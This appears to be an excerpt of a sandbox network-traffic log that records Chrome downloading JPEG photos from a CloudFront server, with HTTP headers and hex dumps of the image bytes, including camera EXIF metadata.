                                                                                                                          2025-01-13 21:01:22 UTC8192INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 f0 00 f0 00 00 ff e1 57 94 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 0a 00 0f 01 02 00 06 00 00 00 86 00 00 00 10 01 02 00 15 00 00 00 8c 00 00 00 1a 01 05 00 01 00 00 00 a2 00 00 00 1b 01 05 00 01 00 00 00 aa 00 00 00 28 01 03 00 01 00 00 00 02 00 00 00 31 01 02 00 20 00 00 00 b2 00 00 00 32 01 02 00 14 00 00 00 d2 00 00 00 3b 01 02 00 08 00 00 00 e6 00 00 00 98 82 02 00 09 00 00 00 ee 00 00 00 69 87 04 00 01 00 00 00 f8 00 00 00 64 03 00 00 43 61 6e 6f 6e 00 43 61 6e 6f 6e 20 45 4f 53 20 35 44 20 4d 61 72 6b 20 49 56 00 00 f0 00 00 00 01 00 00 00 f0 00 00 00 01 00 00 00 41 64 6f 62 65 20 4c 69 67 68 74 72 6f 6f 6d 20 38 2e 30 20 28 4d 61 63 69 6e 74 6f 73 68 29 00 32 30 32 34 3a 31 32 3a 30 34 20 30 30 3a 34
                                                                                                                          Data Ascii: JFIFWExifII*(1 2;idCanonCanon EOS 5D Mark IVAdobe Lightroom 8.0 (Macintosh)2024:12:04 00:4
                                                                                                                          2025-01-13 21:01:22 UTC16384INData Raw: b0 e3 11 26 3f ee 9a e7 aa c7 09 d1 3c 3f ef 5f ff d7 ed d0 b4 fe 91 f8 1b a7 4a 1c 34 d4 f2 3f 31 79 1e fb 51 37 53 47 a7 4c 26 79 99 c1 58 cd 4e fe 3e f9 8d c3 90 4b c9 b0 11 4a ba 4f 94 b5 68 34 8d 7e d6 df 49 96 d9 ee 2d 55 2d c9 43 57 7f 0a e6 4d 16 03 aa 57 a4 79 43 ce 36 fe 55 d5 6c a5 d3 26 6b 99 a5 89 a1 8c af 50 a4 57 1e 12 bb 20 e3 f2 6f 9c da 48 a5 b8 d1 a7 77 8a a0 20 41 4a 1f 7c 8c b1 92 13 19 00 79 32 d8 b4 7d 7c f9 6e c6 19 f4 89 96 68 ae 9d a4 8f 8d 78 27 67 39 59 c5 2a a6 ce 20 c1 35 9b ed 77 ce fa f4 b0 79 6e c9 a4 b7 86 24 25 23 e1 1a b1 af 16 9e 57 62 a0 f2 d9 53 93 7d 95 f8 17 ed 67 5f 8f 51 a5 ec ad 3f 89 a9 9c 71 71 9f ae 5f f4 ce 2e 0c a1 2c f3 ac 62 e8 7e 26 95 df fe 50 79 c4 ef 7b 3e 97 68 9d 59 ae 6f 42 91 ff 00 02 8d fa f3 4d
                                                                                                                          Data Ascii: &?<?_J4?1yQ7SGL&yXN>KJOh4~I-U-CWMWyC6Ul&kPW oHw AJ|y2}|nhx'g9Y* 5wyn$%#WbS}g_Q?qq_.,b~&Py{>hYoBM
                                                                                                                          2025-01-13 21:01:22 UTC9842INData Raw: 36 72 36 ae 36 e9 37 24 37 60 37 9c 37 d7 38 14 38 50 38 8c 38 c8 39 05 39 42 39 7f 39 bc 39 f9 3a 36 3a 74 3a b2 3a ef 3b 2d 3b 6b 3b aa 3b e8 3c 27 3c 65 3c a4 3c e3 3d 22 3d 61 3d a1 3d e0 3e 20 3e 60 3e a0 3e e0 3f 21 3f 61 3f a2 3f e2 40 23 40 64 40 a6 40 e7 41 29 41 6a 41 ac 41 ee 42 30 42 72 42 b5 42 f7 43 3a 43 7d 43 c0 44 03 44 47 44 8a 44 ce 45 12 45 55 45 9a 45 de 46 22 46 67 46 ab 46 f0 47 35 47 7b 47 c0 48 05 48 4b 48 91 48 d7 49 1d 49 63 49 a9 49 f0 4a 37 4a 7d 4a c4 4b 0c 4b 53 4b 9a 4b e2 4c 2a 4c 72 4c ba 4d 02 4d 4a 4d 93 4d dc 4e 25 4e 6e 4e b7 4f 00 4f 49 4f 93 4f dd 50 27 50 71 50 bb 51 06 51 50 51 9b 51 e6 52 31 52 7c 52 c7 53 13 53 5f 53 aa 53 f6 54 42 54 8f 54 db 55 28 55 75 55 c2 56 0f 56 5c 56 a9 56 f7 57 44 57 92 57 e0 58 2f 58
                                                                                                                          Data Ascii: 6r667$7`7788P8899B999:6:t::;-;k;;<'<e<<="=a==> >`>>?!?a??@#@d@@A)AjAAB0BrBBC:C}CDDGDDEEUEEF"FgFFG5G{GHHKHHIIcIIJ7J}JKKSKKL*LrLMMJMMN%NnNOOIOOP'PqPQQPQQR1R|RSS_SSTBTTU(UuUVV\VVWDWWX/X
                                                                                                                          2025-01-13 21:01:22 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                          Data Ascii:
                                                                                                                          2025-01-13 21:01:23 UTC16384INData Raw: d4 e3 cc ef 42 93 8c 67 c4 32 7e 94 63 00 5a e3 b9 22 0d ac aa 4c b8 ee 84 9d 8b 51 65 b4 8c 67 c2 00 0a 04 f1 cf ba 9e 05 91 af 6d 48 5a d4 e2 e3 3b 1d 08 09 28 52 80 51 07 c8 0e 41 fa 54 58 20 4e ee 00 5a 7b 82 b8 fb 49 52 77 05 0d c3 d4 1c 81 c7 fe c5 1d 89 32 e3 a6 2e f2 98 69 a8 eb 7d 2f b6 90 52 c1 5f 25 27 a8 04 f9 f3 c7 9d 4e 32 20 cd 36 c7 75 6a e9 08 3e 82 46 38 56 ea b4 45 6b 56 30 89 12 8c e6 90 a1 b7 ee 56 b1 d1 5c 64 7f 3a 4c 8c 97 a9 e7 7d 6b 76 ba 31 a8 1f 43 32 54 94 0e 80 50 43 08 88 4d ea f0 47 fb 51 a4 30 b8 f7 5b aa c7 32 09 34 c8 0e a6 e3 76 49 c9 7d 58 a8 8f 82 63 4f 5c e7 bf 78 88 db cf 15 25 4b 00 8a 78 11 b9 98 68 30 d1 81 ce 29 96 48 86 b8 69 f9 f7 25 f7 50 02 77 7a a8 e0 0a 69 64 81 f4 6e cd 6f ea fe b6 64 56 c7 c4 9f e5 46 d2
                                                                                                                          Data Ascii: Bg2~cZ"LQegmHZ;(RQATX NZ{IRw2.i}/R_%'N2 6uj>F8VEkV0V\d:L}kv1C2TPCMGQ0[24vI}XcO\x%Kxh0)Hi%PwzidnodVF
                                                                                                                          2025-01-13 21:01:23 UTC16384INData Raw: 36 b6 fc 4e 24 64 66 b4 69 ec 8c 22 f2 53 7d 6e c9 ad a5 d7 48 e8 e9 8d 59 18 66 64 9c b4 da 72 84 a4 63 15 5c e5 b9 e5 1b 21 07 52 51 6c 99 61 d1 0d 6a 60 b9 81 8c 6e f4 aa e2 fd cb 65 17 3e dd c9 6b 93 2d c6 81 1c 21 c2 e8 56 0e e2 73 9a eb 55 8d bc 1e 73 51 ba 36 35 3e e5 a2 7e 0e 9c c1 38 05 bc 54 88 7a 14 97 99 b2 44 82 15 32 43 20 91 d3 77 34 9b 48 ae 31 93 33 ad 47 7a 89 15 c5 7b 02 32 8f df f2 15 07 2c 97 c6 bc 72 c9 8d 0f 78 76 fb 6f 91 19 b7 f2 f3 2a 0a 07 a9 29 f3 ac 57 c3 9e 0e ae 8e 79 ca 65 aa 54 20 db 61 f2 0a 5b 29 dd 95 0c 11 58 27 16 99 b6 0d b7 8f 50 16 ec 6f 5f 6d 4b b8 ae 77 b1 c2 1b 83 4d 6d 3b 9e 23 cf e1 4d 50 e5 0d d9 c1 e8 ba 74 61 a5 d4 28 59 5e e9 71 9f 65 9f f9 21 64 de 6d 56 e4 21 b9 12 9a 41 4a 70 50 0e 4d 7a de 9f 55 77 e8
                                                                                                                          Data Ascii: 6N$dfi"S}nHYfdrc\!RQlaj`ne>k-!VsUsQ65>~8TzD2C w4H13Gz{2,rxvo*)WyeT a[)X'Po_mKwMm;#MPta(Y^qe!dmV!AJpPMzUw
                                                                                                                          2025-01-13 21:01:23 UTC16384INData Raw: 72 41 14 0c 42 41 14 08 ec 98 cc 4e 8c b8 f2 5a 4b ad 38 36 a9 2a 1d 45 38 c9 c5 e6 20 d6 4a 2c 6b 32 f4 b5 cd ab 57 b4 17 60 af 72 ed bb c6 5c 69 5d 56 d0 57 98 c7 20 1f 2c fa 57 4e 56 ab e1 e6 63 9f 5f af d4 a5 45 c5 e3 d0 25 8b b5 fe 4b db 9a 72 2a 03 64 e1 01 65 48 79 be 84 1c 80 52 a1 fa 74 35 17 5d 29 72 9f f8 1e e9 7a 06 b1 77 62 49 d8 a5 a5 2e 74 52 09 f1 24 fa 11 e5 59 2c a1 c7 95 d8 b2 32 c9 15 ab af 10 6c d1 a3 aa e0 b4 26 3b cf 25 2a dc 70 08 ea 47 e9 59 a6 9b 8f 6c fd b9 2e 82 e7 87 83 38 d6 b7 bb 26 a7 ba da ed b6 06 da 5a 7b f4 ba f7 77 83 b5 29 e7 27 1d 39 e2 a3 5d 7e 44 6c d4 6c db f0 b4 b2 b1 96 cb 93 6f 10 6f 3c e7 ec 91 64 ed 72 e0 bb 2e 8d 62 2b 2b 53 6e 77 49 40 29 38 20 a8 81 fe 75 2d 25 11 b3 51 4d 32 5c 2e 5f e4 8a 9c da 84 e6 bb
                                                                                                                          Data Ascii: rABANZK86*E8 J,k2W`r\i]VW ,WNVc_E%Kr*deHyRt5])rzwbI.tR$Y,2l&;%*pGYl.8&Z{w)'9]~Dlloo<dr.b++SnwI@)8 u-%QM2\._
                                                                                                                          2025-01-13 21:01:23 UTC16384INData Raw: 9e 18 09 89 da ae 8d 90 b0 94 6a 48 67 3f bc e8 48 fd 68 71 63 24 d8 d7 ba 61 f6 7b c4 5e a0 a8 67 00 7b 42 79 fd 69 61 8b 02 d3 ad 6d ae f1 1a 44 77 7f c2 b0 68 da 03 c9 be be f7 f5 6d 82 3e b4 60 32 14 cc f7 d7 f8 e3 71 ea 0e 29 0c ce 7b 5b d0 ec de a0 48 92 db 8a dc fa 83 81 38 fe ad c4 a0 f8 be 04 0c 1a 8d 16 4f 4d aa 8e aa bf b4 97 ba ff 00 28 b3 e1 9d 6e b9 7e 5f 73 20 b6 e9 7d 67 a4 e4 be 96 2d 4d 5c 98 50 4a 9c 65 b5 87 02 86 32 95 00 0e e0 79 ea 05 77 7a 8f e0 ba a2 8e e9 b8 4e 3d 9a e1 af fa 19 69 76 e9 f3 85 94 c9 49 fa f5 22 03 d0 ee d1 af 91 1d 4b 4e 21 b8 8f af 7b 7b 94 9d b9 ca c6 e1 d7 d6 b9 2f a0 6b 9d 90 6a e8 ce 0a 49 b7 8c 4b 8f b7 06 b5 ab a5 26 f6 b4 f1 f9 15 2d 0f a8 61 e9 ab d9 95 36 41 6d 92 d2 92 a0 8e 55 9e 08 e3 e5 5d 8f 10 d9
                                                                                                                          Data Ascii: jHg?Hhqc$a{^g{ByiamDwhm>`2q){[H8OM(n~_s }g-M\PJe2ywzN=ivI"KN!{{/kjIK&-a6AmU]
                                                                                                                          2025-01-13 21:01:23 UTC218INData Raw: 39 3b 28 8c 07 a9 a8 4f 84 38 3c b2 34 12 7a 0c 0a ab 25 a3 2e ad 3c a6 ab 9b 1c 50 c2 aa a2 64 8c 17 50 a6 c3 6a c6 4d 6a aa 4b 18 2a 9e 4d 1b b3 3d 06 f6 ac 62 63 69 7b b8 42 70 37 01 52 b5 ed 89 54 1e 65 82 cb da 27 66 b6 0d 1d a2 5e 53 d3 8a ee 4b c1 6b 7a b9 3c f3 80 2b 3c 56 59 a7 1c 19 1b 57 38 28 69 08 31 14 4a 52 06 73 d6 ab 75 36 fb 8f 72 f6 00 4a 56 05 4b 04 4e 2b 7a 7d 68 18 d9 79 74 0c fb bd 5d 02 3b de 2c d0 07 14 a5 52 03 89 2b 27 ce 98 04 34 cb 8b 34 c0 39 98 44 e3 34 60 02 91 10 27 a8 a6 03 a1 b4 a6 81 0b 4a b1 d2 81 a1 cd c7 14 c5 80 47 94 77 52 01 c6 32 68 04 c7 f2 a4 90 68 19 21 0e 4e 46 33 cd 00 58 ed 3a aa e9 66 1f ea 92 54
                                                                                                                          Data Ascii: 9;(O8<4z%.<PdPjMjK*M=bci{Bp7RTe'f^SKkz<+<VYW8(i1JRsu6rJVKN+z}hyt];,R+'449D4`'JGwR2hh!NF3X:fT
                                                                                                                          2025-01-13 21:01:23 UTC10851INData Raw: 91 e9 9e 29 86 45 dd b5 95 ca f6 90 89 cf 95 a4 79 79 50 0d 90 8f ca 00 15 0c 62 90 b2 42 ca 96 87 d4 53 c6 69 0f b8 13 8d f7 43 72 68 01 b1 34 27 a9 a0 05 b7 75 c2 ba d0 01 a8 bb 80 3a d3 c8 0a 55 e1 64 78 41 a3 21 81 4d dc 9f 77 8c 1a 32 08 25 b4 b8 f8 f1 54 e1 3c 31 38 83 ca 86 a6 f2 a0 0e 07 26 b7 d7 3c 95 b5 80 3c e2 ae 22 7d ba 9a 0c 1f 6e e2 8c 86 0e 67 34 0f 07 c5 58 e9 46 40 e6 54 69 64 4d 8e 21 a2 71 9e a6 82 b7 62 41 c3 bb 88 c1 c6 37 1f 3a 97 09 19 a5 27 26 3b 69 6d 2a 6d d7 55 9c 9e 95 2a d6 48 4d e0 36 32 52 fa 9d 88 a0 36 3a 92 9f af 15 29 47 29 a6 41 4b 0f 28 a1 c9 65 71 de 5b 2a fc 48 51 49 f9 57 9e 92 da f0 ce d4 5e 56 49 ed 3a c2 60 41 93 75 77 82 13 b1 bc f9 9a ae 59 ce 11 34 c6 ac cc e1 b9 97 17 7f 28 20 1f 79 a5 2c f6 05 ee 46 46 60
                                                                                                                          Data Ascii: )EyyPbBSiCrh4'u:UdxA!Mw2%T<18&<<"}ng4XF@TidM!qbA7:'&;im*mU*HM62R6:)G)AK(eq[*HQIW^VI:`AuwY4( y,FF`


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          148192.168.11.204997854.239.153.764431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:22 UTC413OUTGET /app/uploads/gthl/2024/11/15144558/0C9A0952-730x487.jpg HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:23 UTC487INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Content-Length: 96174
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:24 GMT
                                                                                                                          Last-Modified: Fri, 15 Nov 2024 19:45:59 GMT
                                                                                                                          ETag: "7f8e9aed6e8c1b57e7c6d54a3d235971"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 924c3fd5fff04ef5cac09fbfc470e618.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: 9zspleS_LIcL1xfoUiD8WCHOnoxHV4xuJotuWeSRRPkgvNRwGkDrMQ==
                                                                                                                          2025-01-13 21:01:23 UTC15897INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 f0 00 f0 00 00 ff e1 39 09 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 0a 00 0f 01 02 00 06 00 00 00 86 00 00 00 10 01 02 00 15 00 00 00 8c 00 00 00 1a 01 05 00 01 00 00 00 a2 00 00 00 1b 01 05 00 01 00 00 00 aa 00 00 00 28 01 03 00 01 00 00 00 02 00 00 00 31 01 02 00 20 00 00 00 b2 00 00 00 32 01 02 00 14 00 00 00 d2 00 00 00 3b 01 02 00 08 00 00 00 e6 00 00 00 98 82 02 00 09 00 00 00 ee 00 00 00 69 87 04 00 01 00 00 00 f8 00 00 00 64 03 00 00 43 61 6e 6f 6e 00 43 61 6e 6f 6e 20 45 4f 53 20 35 44 20 4d 61 72 6b 20 49 56 00 00 f0 00 00 00 01 00 00 00 f0 00 00 00 01 00 00 00 41 64 6f 62 65 20 4c 69 67 68 74 72 6f 6f 6d 20 38 2e 30 20 28 4d 61 63 69 6e 74 6f 73 68 29 00 32 30 32 34 3a 31 31 3a 30 37 20 31 31 3a 35
                                                                                                                          Data Ascii: JFIF9ExifII*(1 2;idCanonCanon EOS 5D Mark IVAdobe Lightroom 8.0 (Macintosh)2024:11:07 11:5
                                                                                                                          2025-01-13 21:01:23 UTC11483INData Raw: 01 c9 01 d1 01 d9 01 e1 01 e9 01 f2 01 fa 02 03 02 0c 02 14 02 1d 02 26 02 2f 02 38 02 41 02 4b 02 54 02 5d 02 67 02 71 02 7a 02 84 02 8e 02 98 02 a2 02 ac 02 b6 02 c1 02 cb 02 d5 02 e0 02 eb 02 f5 03 00 03 0b 03 16 03 21 03 2d 03 38 03 43 03 4f 03 5a 03 66 03 72 03 7e 03 8a 03 96 03 a2 03 ae 03 ba 03 c7 03 d3 03 e0 03 ec 03 f9 04 06 04 13 04 20 04 2d 04 3b 04 48 04 55 04 63 04 71 04 7e 04 8c 04 9a 04 a8 04 b6 04 c4 04 d3 04 e1 04 f0 04 fe 05 0d 05 1c 05 2b 05 3a 05 49 05 58 05 67 05 77 05 86 05 96 05 a6 05 b5 05 c5 05 d5 05 e5 05 f6 06 06 06 16 06 27 06 37 06 48 06 59 06 6a 06 7b 06 8c 06 9d 06 af 06 c0 06 d1 06 e3 06 f5 07 07 07 19 07 2b 07 3d 07 4f 07 61 07 74 07 86 07 99 07 ac 07 bf 07 d2 07 e5 07 f8 08 0b 08 1f 08 32 08 46 08 5a 08 6e 08 82 08 96 08
                                                                                                                          Data Ascii: &/8AKT]gqz!-8COZfr~ -;HUcq~+:IXgw'7HYj{+=Oat2FZn
                                                                                                                          2025-01-13 21:01:23 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20
                                                                                                                          Data Ascii:
                                                                                                                          2025-01-13 21:01:23 UTC16384INData Raw: c8 d8 65 1b 01 85 3f 43 8d ab d1 2c 12 9f 79 1a fc 2b fb 1f 89 59 20 bf da bf 52 0b a9 ad 74 bd 22 7d 4d 7b 49 0c 70 bc e1 1e 43 97 2a b9 c6 3e 95 23 a5 8c 24 9b 93 6f ee d9 27 99 fd 34 97 f2 3c cf 8a 34 7b ee 29 4d 22 55 90 2c ba e4 3c e2 28 dc e2 07 0a 39 b0 4f e8 32 9c 11 e6 33 5c a5 f3 56 48 f7 75 5e ff 00 f6 8f 14 95 fc c8 f5 bd 1f 49 b5 d2 6d 12 da d6 de 28 55 54 03 c8 a0 73 10 00 c9 f3 3b 57 ae 31 a8 a4 75 8a a4 65 f1 3a 41 2c 91 09 15 e2 21 8a f6 a5 32 1f ba 76 eb e1 b9 ae d1 c1 2c 8b e5 3d 3a 7d 62 c0 de ee 8a a9 a4 4d a8 89 3d de 23 10 9e 30 b2 cc 7b b9 f1 24 0f 3c e3 ce bb e3 8c 30 4b 7c b9 67 0d 4e a6 7a 88 79 4b 88 9a da 77 0f c5 6b 00 17 0e d2 ca e0 19 89 e9 23 79 9a e5 39 47 74 a5 05 56 6b cd ca e1 18 4e 57 b4 b9 2d ba 43 6d 24 70 46 a8 31
                                                                                                                          Data Ascii: e?C,y+Y Rt"}M{IpC*>#$o'4<4{)M"U,<(9O23\VHu^Im(UTs;W1ue:A,!2v,=:}bM=#0{$<0K|gNzyKwk#y9GtVkNW-Cm$pF1
                                                                                                                          2025-01-13 21:01:23 UTC16384INData Raw: 5a 09 e6 54 6c f2 81 96 fe 55 e4 cd 3d ab 83 d3 a6 c5 be 56 fa 3a 39 39 3b 2e 55 23 02 bc 56 cf aa 63 c8 51 cc 96 d2 e7 b2 94 15 38 f0 f5 ae b1 75 ca 3c f3 56 a9 9e b1 ec 27 8a f5 6f ea 95 c6 95 ee f0 4b 1e 8f 23 a7 33 b9 0e 17 25 80 c0 ce 7c 47 a5 7b 3b 3e 5d 34 e8 f6 6b 39 5a 7b 48 66 7e 5e 67 40 c7 97 a6 48 a1 51 29 c3 02 0f d6 a5 83 95 d3 ae ec 54 5f 59 58 5d a4 b1 bb 98 80 05 bb 8c 73 9e 5c 03 e2 4e ff 00 b2 7c 8d 1d 90 cf b7 d3 6d 64 06 55 91 66 81 f7 dd d8 0e 5e 65 19 cf 2f 9a 6e 7d 7d 69 72 04 56 37 5a 4b de c0 6d d2 7e d9 26 11 20 69 4e 1d b2 4f 5c 7a 1c fc 8d 2d fa a0 8b d7 fa 3c 3a 86 a5 25 dc 90 b3 c9 8c 3f 67 31 2a 00 c6 db 80 3c 07 4f ad 4b 90 e4 bd 0e 91 a5 0c 5c 32 73 4a 58 b3 90 31 cc d8 e5 c1 1e 1b 6d 8a e5 93 3a c6 ae 44 72 51 ec bf 65
                                                                                                                          Data Ascii: ZTlU=V:99;.U#VcQ8u<V'oK#3%|G{;>]4k9Z{Hf~^g@HQ)T_YX]s\N|mdUf^e/n}}irV7ZKm~& iNO\z-<:%?g1*<OK\2sJX1m:DrQe
                                                                                                                          2025-01-13 21:01:23 UTC11610INData Raw: 34 e3 94 6e c4 01 ea 68 f8 09 73 47 b5 70 96 8f 69 a4 e9 71 c1 1c b1 bc cd de 95 95 ba b7 fb ab e4 e6 9e f9 59 f4 f1 43 64 68 e9 ed ad c7 3e 48 c8 c5 71 a3 a5 82 e9 16 3b c3 c8 bc a1 a3 56 3f 3d c5 59 24 44 58 b9 e1 bd 5b 59 d2 81 b2 b3 92 50 72 41 c8 00 fd eb 71 84 9a e1 18 96 45 17 c9 c2 ea 1c 17 c4 76 d7 3c af a3 de 6e 70 0a c7 cc 09 f9 8d ab 7b 5a 39 ef 4f d4 81 38 4f 5c 33 24 6d a6 5c c6 59 c4 7c ce 84 28 27 cc f8 0f 5a 28 be 8b b9 1a e3 d9 8f 12 33 f2 25 b5 b4 9b e0 14 b9 8c 83 f8 d5 f2 e5 ec 4f 31 17 53 d9 0f 14 35 c7 63 ee f0 0c 80 79 fb 50 57 af 98 a7 95 22 79 91 33 a7 e0 2d 72 d7 55 96 c1 ad 97 9a 26 00 ca 5b 08 7c 72 0f 53 f6 ae 53 7b 5d 33 be 2c 72 c8 ad 1d f6 87 c3 53 5b c2 a9 3c d9 f3 0a 31 f8 d7 17 26 fa 3d 8b 0c 57 67 41 0d b5 9e 9b 08 51
                                                                                                                          Data Ascii: 4nhsGpiqYCdh>Hq;V?=Y$DX[YPrAqEv<np{Z9O8O\3$m\Y|('Z(3%O1S5cyPW"y3-rU&[|rSS{]3,rS[<1&=WgAQ
                                                                                                                          2025-01-13 21:01:23 UTC8032INData Raw: 80 88 5c 0e 94 b1 42 31 31 1b 81 40 37 dd 98 f8 0c 52 c0 d6 b3 24 ed 40 5a b6 b1 88 db 3a 4c d2 29 fd 1e 5c 6f f3 ae 4e 36 ec ed 1c 94 a8 af 15 9f bb 8c 60 66 ba 1c 9f b9 3c 70 3b b0 55 5c 93 b0 02 96 28 ea 74 af 66 ba e6 a7 12 ca 90 08 90 f4 e7 f1 ac ef 34 a2 6c d9 fb 1b d6 e7 7c 4c f1 c6 be 78 cd 4d cf d8 6d 3d 3b 80 38 26 e7 85 52 44 7b 93 2a 3e fc b8 c6 2a ab f5 35 e8 77 36 f0 3c 6f cf 5b 48 85 b7 99 40 1d dc 1a d1 94 8a b7 57 e5 17 a0 c5 54 38 32 6e f5 74 0a 79 80 c5 6d 22 1c b6 b1 ad 42 a1 8a 49 ca 6b b4 62 61 9c 56 a7 c4 b2 b7 32 73 e7 d6 bb c6 06 5b 39 e9 ef 65 9d 89 2c 6b 55 44 65 73 bd 68 c8 b1 40 10 2a 80 e2 a1 45 54 80 34 03 4d 40 0c d0 a0 34 20 28 05 40 2a 00 66 80 44 d0 0d a0 16 68 05 9a 00 83 42 0f 06 a8 a0 e6 a1 43 9a b6 46 2c d0 c8 b9 a8
                                                                                                                          Data Ascii: \B11@7R$@Z:L)\oN6`f<p;U\(tf4l|LxMm=;8&RD{*>*5w6<o[H@WT82ntym"BIkbaV2s[9e,kUDesh@*ET4M@4 (@*fDhBCF,


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          149192.168.11.204997954.239.153.764431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:23 UTC413OUTGET /app/uploads/gthl/2024/11/28141908/0C9A3113-730x487.jpg HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:23 UTC488INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Content-Length: 113124
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:24 GMT
                                                                                                                          Last-Modified: Thu, 28 Nov 2024 19:19:09 GMT
                                                                                                                          ETag: "d1893f6c477be37e8388dc8b656b9def"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 6306947fb6ab60dc617ca2e025941652.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: 8i98_5cFRnBv4a6FIu4OmeyEbzoG47rp-U7uVakuoRqSPjZi8p4y2A==
                                                                                                                          2025-01-13 21:01:23 UTC15896INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 f0 00 f0 00 00 ff e1 4d 47 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 0a 00 0f 01 02 00 06 00 00 00 86 00 00 00 10 01 02 00 15 00 00 00 8c 00 00 00 1a 01 05 00 01 00 00 00 a2 00 00 00 1b 01 05 00 01 00 00 00 aa 00 00 00 28 01 03 00 01 00 00 00 02 00 00 00 31 01 02 00 20 00 00 00 b2 00 00 00 32 01 02 00 14 00 00 00 d2 00 00 00 3b 01 02 00 08 00 00 00 e6 00 00 00 98 82 02 00 09 00 00 00 ee 00 00 00 69 87 04 00 01 00 00 00 f8 00 00 00 64 03 00 00 43 61 6e 6f 6e 00 43 61 6e 6f 6e 20 45 4f 53 20 35 44 20 4d 61 72 6b 20 49 56 00 00 f0 00 00 00 01 00 00 00 f0 00 00 00 01 00 00 00 41 64 6f 62 65 20 4c 69 67 68 74 72 6f 6f 6d 20 38 2e 30 20 28 4d 61 63 69 6e 74 6f 73 68 29 00 32 30 32 34 3a 31 31 3a 32 36 20 31 32 3a 35
                                                                                                                          Data Ascii: JFIFMGExifII*(1 2;idCanonCanon EOS 5D Mark IVAdobe Lightroom 8.0 (Macintosh)2024:11:26 12:5
